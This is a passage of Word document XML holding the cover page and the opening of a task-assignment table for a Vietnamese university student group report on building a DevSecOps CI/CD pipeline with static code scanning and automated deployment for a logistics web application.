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25553F85" w:rsidR="004657F9" w:rsidRPr="0000433B" w:rsidRDefault="00D43DF5" w:rsidP="004657F9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43DF5">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-----</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43DF5">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F09A"/>
      </w:r>
      <w:r w:rsidRPr="00D43DF5">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F09B"/>
      </w:r>
      <w:r w:rsidRPr="00D43DF5">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F026"/>
      </w:r>
      <w:r w:rsidRPr="00D43DF5">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F09A"/>
      </w:r>
      <w:r w:rsidRPr="00D43DF5">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F09B"/>
      </w:r>
      <w:r w:rsidRPr="00D43DF5">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-----</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F10029" w14:textId="77777777" w:rsidR="008A0326" w:rsidRDefault="008A0326" w:rsidP="004657F9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C862528" w14:textId="415DCF93" w:rsidR="00621AE7" w:rsidRPr="00AE47E8" w:rsidRDefault="008A0326" w:rsidP="004657F9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0009419C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="098E8137" wp14:editId="3AFFDBA5">
            <wp:extent cx="876300" cy="84490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noChangeArrowheads="1" noCrop="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15375" cy="882579"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C4B9F0" w14:textId="3E1E18C2" w:rsidR="00621AE7" w:rsidRPr="00AE47E8" w:rsidRDefault="00621AE7" w:rsidP="004657F9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A8ABE3" w14:textId="18D6DC0A" w:rsidR="00621AE7" w:rsidRPr="00AE47E8" w:rsidRDefault="00621AE7" w:rsidP="004657F9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33FE2A98" w14:textId="7FCBF595" w:rsidR="004657F9" w:rsidRPr="00AE47E8" w:rsidRDefault="004657F9" w:rsidP="004657F9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E99461F" w14:textId="6923E9CD" w:rsidR="00AE6801" w:rsidRPr="00AE47E8" w:rsidRDefault="00AE6801"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1FA692FE" w14:textId="27512977" w:rsidR="00B03F2E" w:rsidRPr="00E724F4" w:rsidRDefault="00865D55" w:rsidP="004657F9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>BÁO CÁO BÀI TẬP LỚN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D60E31" w14:textId="370BEC3B" w:rsidR="00AE6801" w:rsidRPr="00AE47E8" w:rsidRDefault="00AE6801" w:rsidP="004657F9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F726C39" w14:textId="77777777" w:rsidR="00AE6801" w:rsidRPr="00AE47E8" w:rsidRDefault="00AE6801" w:rsidP="004657F9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="737F0FCE" w14:textId="419A312A" w:rsidR="004657F9" w:rsidRPr="0000433B" w:rsidRDefault="00C202B1" w:rsidP="004657F9">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>ĐỀ TÀI: HỆ THỐNG DEVSECOPS CI/CD: KIỂM ĐỊNH MÃ NGUỒN, GIÁM SÁT TẬP TRUNG VÀ TRIỂN KHAI PRODUCTION CHO INLANEWEB LOGISTICS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EAAF03" w14:textId="7048CA32" w:rsidR="001E589E" w:rsidRPr="00AE47E8" w:rsidRDefault="001E589E" w:rsidP="00A16434">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34329BA8" w14:textId="46E52295" w:rsidR="00C202B1" w:rsidRPr="008E7D06" w:rsidRDefault="00D23CEF" w:rsidP="00C202B1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E7D06">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E7D06">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2318AE78" w14:textId="77777777" w:rsidR="00865D55" w:rsidRPr="0000433B" w:rsidRDefault="00E10AD7" w:rsidP="003E3490">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0000433B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nhóm s</w:t>
      </w:r>
      <w:r w:rsidR="003E3490" w:rsidRPr="0000433B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inh viên thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA6146A" w14:textId="53CE7B19" w:rsidR="004657F9" w:rsidRPr="0000433B" w:rsidRDefault="003E3490" w:rsidP="008425EB">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Nguyễn Giang Nam (Trưởng nhóm)</w:t>
        <w:tab/>
        <w:t>B22DCCN539</w:t>
        <w:br/>
        <w:t>2. Nguyễn Đình Hải</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>B22DCCN271</w:t>
        <w:br/>
        <w:t>3. Đào Xuân Mạnh</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>B22DCCN512</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69561EAC" w14:textId="7D5A3A93" w:rsidR="008425EB" w:rsidRPr="0000433B" w:rsidRDefault="008425EB" w:rsidP="008425EB">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4. Lê Đức Anh</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>B22DCCN085</w:t>
        <w:br/>
        <w:t>5. Nguyễn Phương Mai</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>B22DCCN521</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573F5D85" w14:textId="73FEDDE4" w:rsidR="004657F9" w:rsidRPr="0000433B" w:rsidRDefault="0000433B" w:rsidP="0000433B">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Khóa: 2022 – 2027 (Khóa D22)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623EA404" w14:textId="33B55E2F" w:rsidR="0000433B" w:rsidRPr="0000433B" w:rsidRDefault="0000433B" w:rsidP="0000433B">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Hệ: Đại học chính quy, ngành An toàn thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B7D34E" w14:textId="77777777" w:rsidR="004657F9" w:rsidRPr="0000433B" w:rsidRDefault="004657F9" w:rsidP="004657F9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46929FC9" w14:textId="39243F9E" w:rsidR="00345E7A" w:rsidRDefault="00345E7A" w:rsidP="003E3490">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Tập thể hướng dẫn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C117705" w14:textId="7044C6F9" w:rsidR="004657F9" w:rsidRDefault="00345E7A" w:rsidP="00345E7A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>- Giảng viên hướng dẫn: TS. Hoàng Xuân Dậu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51019270" w14:textId="74D08FB4" w:rsidR="00345E7A" w:rsidRDefault="00345E7A" w:rsidP="00345E7A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>- Học phần: Thực hành Kỹ thuật DevOps &amp; DevSecOps Nâng cao</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F4D763" w14:textId="5980B7A1" w:rsidR="00345E7A" w:rsidRDefault="00345E7A" w:rsidP="00345E7A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>Khoa An toàn Thông tin - PTIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4120A9ED" w14:textId="3A119386" w:rsidR="00345E7A" w:rsidRDefault="00345E7A" w:rsidP="00345E7A">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F555512" w14:textId="77777777" w:rsidR="00345E7A" w:rsidRPr="00345E7A" w:rsidRDefault="00345E7A" w:rsidP="00345E7A">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="50"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44BAAB04" w14:textId="77777777" w:rsidR="004657F9" w:rsidRPr="00AE47E8" w:rsidRDefault="004657F9" w:rsidP="003E3490">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:sectPr w:rsidR="004657F9" w:rsidRPr="00AE47E8"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Pr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>HÀ NỘI, THÁNG 10 NĂM 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6E7E4D" w14:textId="4A292A57" w:rsidR="00274447" w:rsidRPr="00B6285A" w:rsidRDefault="00274447" w:rsidP="00B6285A">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00274447">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PHÂN CÔNG NHIỆM VỤ NHÓM THỰC HIỆN</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562"/>
        <w:gridCol w:w="4459"/>
        <w:gridCol w:w="2925"/>
        <w:gridCol w:w="1512"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E10AD7" w:rsidRPr="00E10AD7" w14:paraId="482A71F3" w14:textId="77777777" w:rsidTr="00D41C81">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21383632" w14:textId="7F1E67FE" w:rsidR="00E10AD7" w:rsidRPr="00E10AD7" w:rsidRDefault="00E10AD7" w:rsidP="00D41C81">
            <w:pPr>
              <w:pStyle w:val="CTDT-Text"/>
              <w:spacing w:before="0" w:line="264" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E10AD7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4459" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0483DE7B" w14:textId="18A3FF4C" w:rsidR="00E10AD7" w:rsidRPr="00E10AD7" w:rsidRDefault="00D41C81" w:rsidP="00D41C81">
            <w:pPr>
              <w:pStyle w:val="CTDT-Text"/>
              <w:spacing w:before="0" w:line="264" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Công việc / Nhiệm vụ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51FABEA5" w14:textId="1E4A96D3" w:rsidR="00E10AD7" w:rsidRPr="00E10AD7" w:rsidRDefault="00D41C81" w:rsidP="00D41C81">
            <w:pPr>
              <w:pStyle w:val="CTDT-Text"/>
              <w:spacing w:before="0" w:line="264" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SV thực hiện</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1512" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B708EFE" w14:textId="2CEAFCC7" w:rsidR="00E10AD7" w:rsidRPr="00E10AD7" w:rsidRDefault="00D41C81" w:rsidP="00D41C81">
            <w:pPr>
              <w:pStyle w:val="CTDT-Text"/>
              <w:spacing w:before="0" w:line="264" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Thời hạn </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:br/>
              <w:t>hoàn thành</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="562"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4459"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Thiết kế tổng thể kiến trúc đường ống CI/CD, viết công cụ Policy Guard Stage 1, thiết lập môi trường thử nghiệm tạm thời Stage 3, cấu hình triển khai tự động qua SSH Stage 4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2925"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nguyễn Giang Nam</w:t>
              <w:br/>
              <w:t>(Trưởng nhóm)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hoàn thành</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="562"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8F9FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4459"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8F9FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Tích hợp khung quét an ninh tĩnh ở Stage 2 với SonarQube và Semgrep, cấu hình tập luật an ninh địa phương và xuất báo cáo an ninh tự động.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2925"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8F9FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nguyễn Đình Hải</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F8F9FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hoàn thành</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="562"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4459"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="130" w:type="dxa"/>
              <w:right w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
